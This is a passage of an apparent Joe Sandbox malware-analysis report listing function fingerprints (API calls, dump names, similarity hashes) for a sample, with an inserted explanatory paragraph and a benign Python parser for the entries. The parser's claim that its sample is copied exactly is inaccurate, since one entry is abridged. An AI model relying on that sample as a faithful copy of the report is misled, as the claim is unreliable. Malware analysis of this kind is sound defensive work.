                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
APIs
  • Part of subcall function 0040F6F0: _wcslen.LIBCMT ref: 0040F705
  • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00454478,?,00000000,?,?), ref: 0040F71E
  • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 0040F747
• _strcat.LIBCMT ref: 0040F786
  • Part of subcall function 0040F850: _strlen.LIBCMT ref: 0040F858
  • Part of subcall function 0040F850: _sprintf.LIBCMT ref: 0040F9AE
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: ByteCharMultiWide$_sprintf_strcat_strlen_wcslen
• String ID:
• API String ID: 3199840319-0
APIs
• SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 0040D779
• FreeLibrary.KERNEL32(?), ref: 0040D78E
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: FreeInfoLibraryParametersSystem
• String ID:
• API String ID: 3403648963-0
APIs
  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
• SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 004613AC
• SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004613E7
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: MessageSend$_memmove_wcslen
• String ID:
• API String ID: 1589278365-0
APIs
• InternetQueryOptionW.WININET(00000000,00000026,00000000,?), ref: 0043189B
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
• InternetQueryOptionW.WININET(00000000,00000026,00000000,?), ref: 004318C3
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: InternetOptionQuery$_malloc
• String ID:
• API String ID: 2619070002-0
                                                                                                                                                                                                                                                            • Opcode ID: 6d313294d476629a8f3ae79724b5f34c259a0275e91cbc2ecca212968965c20d
                                                                                                                                                                                                                                                            • Instruction ID: d338c915724bbfe514befdfbba895777103518f1cf871b5543e5154b2c24ef6a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6d313294d476629a8f3ae79724b5f34c259a0275e91cbc2ecca212968965c20d
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6B01A7B24012187EEA10EF96DCC5CEBB79CEF552A4F00803BF6088B150D575ED95D6B4
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • send.WS2_32(00000000,00000000,00000000,00000000,?,?), ref: 0046D1DE
                                                                                                                                                                                                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 0046D202
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ErrorLastsend
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1802528911-0
                                                                                                                                                                                                                                                            • Opcode ID: 08100c94a5b43882081f3a723f1166a421bc8f2402b282ab06c57959a902fbcb
                                                                                                                                                                                                                                                            • Instruction ID: 3b0603a3594e44eb825cb878ac43b0a40af82fd82cd75190e916dcf9de0a17b0
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 08100c94a5b43882081f3a723f1166a421bc8f2402b282ab06c57959a902fbcb
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1D11C476600204AFD310EF69D985B1BB7E8FB88324F10866EF858D7380DA35EC40C7A4
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                                                                                                                                                                                                            • __lock_file.LIBCMT ref: 00414A8D
                                                                                                                                                                                                                                                              • Part of subcall function 00415471: __lock.LIBCMT ref: 00415496
                                                                                                                                                                                                                                                            • __fclose_nolock.LIBCMT ref: 00414A98
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2800547568-0
                                                                                                                                                                                                                                                            • Opcode ID: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                                                                                                                                                                                                                                            • Instruction ID: d9443fdd3ee0a3059f5d17ec53abbfe2105cc8a5d10ddad395bff0ae1f283336
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EEF0F6308417019AD710AB7588027EF37A09F41379F22864FA061961D1C73C85C29B5D
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • timeGetTime.WINMM ref: 0040D3CC
                                                                                                                                                                                                                                                              • Part of subcall function 004091E0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409266
                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000000), ref: 0042E19F
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: MessagePeekSleepTimetime
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1792118007-0
                                                                                                                                                                                                                                                            • Opcode ID: b23f761a4926100a078f8ea7e5554c9688d511087b6a7685b7d02aad0cb4bb0e
                                                                                                                                                                                                                                                            • Instruction ID: 26d929e072eec6e6aac8e4f5aec239a67d26821fa4f7aa926e5107a94785e9a2
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b23f761a4926100a078f8ea7e5554c9688d511087b6a7685b7d02aad0cb4bb0e
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2BF05E302442029BC314AF66D549B6ABBE5AB55350F10053EE91997391DBB0A800CB99
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • __lock_file.LIBCMT ref: 00415012
                                                                                                                                                                                                                                                            • __ftell_nolock.LIBCMT ref: 0041501F
                                                                                                                                                                                                                                                              • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: __ftell_nolock__getptd_noexit__lock_file
• String ID:
• API String ID: 2999321469-0
• Opcode ID: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
• Instruction ID: e3e7bc223609ce985a1750c66bb322057640979a4505571362f253753ce4bf01
• Opcode Fuzzy Hash: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
• Instruction Fuzzy Hash: 64F03030900605EADB107FB5DD027EE3B70AF443A8F20825BB0259A0E1DB7C8AC29A59
APIs
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: HookWindows
• String ID:
• API String ID: 2559412058-0
• Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
• Instruction ID: 21b87f0337b3904faf2e49e7d89a80b8c5538d611ad57d97d778efbd48141229
• Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
• Instruction Fuzzy Hash: 8131F770A00105DBC718DF88E590AAAF7B1FB49310B6486A6E409CF355DB78EDC1CBD9
APIs
• IsWindow.USER32(00000000), ref: 0046F3F1
  • Part of subcall function 00436299: _memmove.LIBCMT ref: 004362D9
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: Window_memmove
• String ID:
• API String ID: 517827167-0
• Opcode ID: 9fbfc9f8aed1688e47d472757497f7b005165081132f4017b987863961a9c52e
• Instruction ID: bb29974ae8a0ca66dd60d7796f545a3f68a626f1234de100ca197a45a268520a
• Opcode Fuzzy Hash: 9fbfc9f8aed1688e47d472757497f7b005165081132f4017b987863961a9c52e
• Instruction Fuzzy Hash: 5111CEB22001157AE200AAA6EC80DFBF75CEBD0365F04413BFD0892102DB39A95983B9
APIs
• LoadLibraryW.KERNEL32(00000000,?), ref: 00457761
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
• Opcode ID: 8a9e931f5df7c35fae1f851885a685ed43e1bc238bed7c6dce56ef00f4aff6b6
• Instruction ID: 5ee34fb173b86911bde6fe8703329502067a709a2034f08e31945737d6b5420b
• Opcode Fuzzy Hash: 8a9e931f5df7c35fae1f851885a685ed43e1bc238bed7c6dce56ef00f4aff6b6
• Instruction Fuzzy Hash: 4011A3762002019BD710DF69E840A8BB7E9AF89315F11C57FE9598B242CB78B8458B94
APIs
• _wcslen.LIBCMT ref: 00441ECD
  • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
  • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: _wcslen$_wcscpy
• String ID:
• API String ID: 3469035223-0
• Opcode ID: 611bdd1bce6b08a39b3ffc0a7d572f0eca65f574359c77a1447a2b24e27a2d60
• Instruction ID: 2fbb190dad4ce56573c0fa61da4d13feb20fc8bc688041f2d473ed6297838154
• Opcode Fuzzy Hash: 611bdd1bce6b08a39b3ffc0a7d572f0eca65f574359c77a1447a2b24e27a2d60
• Instruction Fuzzy Hash: 42F03172600204AFD700DF9DEC8199BB3E8EF88725F14812AFA18D7251D6B5ED458BA5
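Each block above is one function fingerprint from the sandbox's code analysis: the API calls Joe resolved inside the function (with call-site addresses), the memory dump the function was lifted from, and the Similarity identifiers (API String ID, Opcode ID, Instruction ID and the two fuzzy hashes) that let you find the same function in other reports. In every entry on this page the Opcode ID equals the Opcode Fuzzy Hash, and the call-site addresses all sit above the 00400000 image base of the source dump. To pivot on these values you need them as structured records rather than HTML text, so here is a small parser for the block format as an added example, not part of the report or of Joe Sandbox's own tooling. Its SAMPLE is copied from two entries on this page (Window_memmove and LibraryLoad) exactly as the export renders them, including the "Download File" link label that the export fuses onto each Associated dump name; the record layout and the two sanity checks are my own choice.

```python
"""Parse Joe Sandbox function-analysis entries into records you can pivot on.

Added example, not part of the Joe Sandbox report or its tooling. SAMPLE is copied from
two of this report's entries (Window_memmove, LibraryLoad) exactly as the HTML export
renders them, fused "Download File" link label included. Record layout is my choice.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

SAMPLE = """\
APIs
• IsWindow.USER32(00000000), ref: 0046F3F1
  • Part of subcall function 00436299: _memmove.LIBCMT ref: 004362D9
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: Window_memmove
• String ID:
• API String ID: 517827167-0
• Opcode ID: 9fbfc9f8aed1688e47d472757497f7b005165081132f4017b987863961a9c52e
• Opcode Fuzzy Hash: 9fbfc9f8aed1688e47d472757497f7b005165081132f4017b987863961a9c52e
APIs
• LoadLibraryW.KERNEL32(00000000,?), ref: 00457761
Similarity
• API ID: LibraryLoad
• API String ID: 1029625771-0
• Opcode ID: 8a9e931f5df7c35fae1f851885a685ed43e1bc238bed7c6dce56ef00f4aff6b6
• Opcode Fuzzy Hash: 8a9e931f5df7c35fae1f851885a685ed43e1bc238bed7c6dce56ef00f4aff6b6
"""

API_RE = re.compile(
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}): )?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>\w+)(?:\([^)]*\))?,? ref: (?P<ref>[0-9A-Fa-f]{8})"
)
HEADERS = ("APIs", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity")


@dataclass
class ApiRef:
    name: str
    module: str
    ref: int                          # call-site address in the dump
    subcall_of: Optional[int] = None  # set when Joe lists the call under a subcall


@dataclass
class FunctionEntry:
    apis: List[ApiRef] = field(default_factory=list)
    image_base: Optional[int] = None  # "Offset:" of the source dump
    associated: List[str] = field(default_factory=list)
    meta: Dict[str, str] = field(default_factory=dict)  # Source File, Snapshot File, API ID, Opcode ID, ...


def parse_entries(text: str) -> List[FunctionEntry]:
    """One FunctionEntry per 'APIs' header; each bullet is routed by the section above it."""
    entries: List[FunctionEntry] = []
    cur: Optional[FunctionEntry] = None
    section = ""
    for raw in text.splitlines():
        line = raw.strip()
        if line in HEADERS:
            if line == "APIs":
                cur = FunctionEntry()
                entries.append(cur)
            section = line
            continue
        if not line or cur is None:
            continue
        item = line.lstrip("• ").strip()
        if section == "APIs":
            m = API_RE.search(item)
            if m:
                sub = int(m["sub"], 16) if m["sub"] else None
                cur.apis.append(ApiRef(m["name"], m["module"], int(m["ref"], 16), sub))
            continue
        key, _, val = (s.strip() for s in item.partition(":"))
        if key == "Associated":  # the HTML export fuses the "Download File" link label onto the name
            cur.associated.append(val.replace("Download File", "").strip())
            continue
        cur.meta[key] = val
        if key == "Source File":  # "<dump>.sdmp, Offset: 00400000, based on PE: true"
            off = re.search(r"Offset: ([0-9A-Fa-f]+)", val)
            cur.image_base = int(off[1], 16) if off else None
    return entries


def check_entry(e: FunctionEntry) -> List[str]:
    """Sanity checks before using an entry as a hunting pivot."""
    problems = []
    if e.meta.get("Opcode ID") != e.meta.get("Opcode Fuzzy Hash"):
        problems.append("Opcode ID and Opcode Fuzzy Hash differ")
    for a in e.apis:
        if e.image_base is not None and a.ref < e.image_base:
            problems.append(f"{a.name} ref {a.ref:08X} lies below image base {e.image_base:08X}")
    return problems
```

Run `parse_entries` over the text of a whole report and key the resulting entries by `meta["Opcode ID"]` or `meta["API String ID"]`; the same keys from a second report then give you the shared functions directly. `check_entry` is the pre-flight a practitioner wants before trusting a pivot: an entry whose Opcode ID and Opcode Fuzzy Hash disagree, or whose call sites fall outside the dumped image, has been cut or mangled by the export and should not be used as a signature.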
APIs
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: __lock_file
• String ID:
• API String ID: 3031932315-0
APIs
• _wcslen.LIBCMT ref: 00443D34
  • Part of subcall function 00433D9E: EnumProcesses.PSAPI(?,00000800,?,?,00443D49,?,?,?,004A8178), ref: 00433DBB
Similarity
• API ID: EnumProcesses_wcslen
• String ID:
• API String ID: 3303492691-0
APIs
• __lock_file.LIBCMT ref: 004142F5
  • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
Similarity
• API ID: __getptd_noexit__lock_file
• String ID:
• API String ID: 2597487223-0
APIs
• WSAStartup.WS2_32(00000202,?), ref: 004589C6
Similarity
• API ID: Startup
• String ID:
• API String ID: 724789610-0
APIs
Similarity
• API ID: __fread_nolock
• String ID:
• API String ID: 2638373210-0
                                                                                                                                                                                                                                                            • Opcode ID: edb91a60a9196e9afb8971b982a6898244a9e52d7973f3fad70e56183420ffb1
                                                                                                                                                                                                                                                            • Instruction ID: 9e9a42c0c7b58ac35d14f3716b04d6bdbb365f426eb98045716108692e45ddfa
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: edb91a60a9196e9afb8971b982a6898244a9e52d7973f3fad70e56183420ffb1
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 82F01CB16047045FDB35CA24D941BA3B7E89B4A350F00481EFAAA87342D6B6B845CA99

APIs
• SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 0043633F
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: MessageSendTimeout
• String ID:
• API String ID: 1599653421-0
• Opcode ID: 9860d8fd04dca8f4639475c0e949a449d7e9360e0213879cd93aaa3a815527bf
• Instruction ID: 404f820d5c191ead8adfbb6f72584c17bf9223e8bc32b4a3dee19ec2549da310
• Opcode Fuzzy Hash: 9860d8fd04dca8f4639475c0e949a449d7e9360e0213879cd93aaa3a815527bf
• Instruction Fuzzy Hash: 9BD0C97139030876E7248A659D0BF96375C5710F40F5081257B04A91D0D9A0F5408658

APIs
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: __wfsopen
• String ID:
